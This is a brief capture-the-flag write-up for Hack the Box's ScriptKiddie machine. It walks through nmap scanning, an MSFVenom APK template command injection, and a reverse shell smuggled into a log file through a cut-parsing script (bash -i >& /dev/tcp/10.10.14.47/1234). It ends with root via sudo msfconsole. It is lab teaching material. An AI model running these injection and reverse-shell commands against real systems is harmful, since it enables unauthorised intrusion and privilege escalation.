ScriptKiddie
Writeup for ScriptKiddie from Hack the Box
Last updated
Writeup for ScriptKiddie from Hack the Box
Last updated
nmap -sV 10.10.10.226
There is an option to generate an MSFVenom payload, using a template file.
Searchsploit for any relevant exploits:
POC code for APK template file command injection vulnerability:
Upload the produced APK file as the template.
'Upgrade' the shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
Exploring the folders a bit more, there is a pwn
user, and there is a scanlosers
script.
Note the cut -d' ' -f3-'
: refer to the manual page https://man7.org/linux/man-pages/man1/cut.1.html
This will split the string based on the 'space' delimiter, and keep everything from the 3rd field onwards. By adding two spaces to the front, we are splitting the string into: "" <space> "" <space> ";/bin/bash -c ..."
so that the command is retained.
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.47/1234 0>&1' #" >> /home/kid/logs/hackers
Set up a netcat listener again. Now, we got a shell as the pwn
user, with higher privileges.
Check the available sudo commands as the pwn user: sudo -l
We are able to run msfconsole
as root!
Since msfconsole is able to execute standard commands as well, simply doing sudo msfconsole
will give us a shell as root.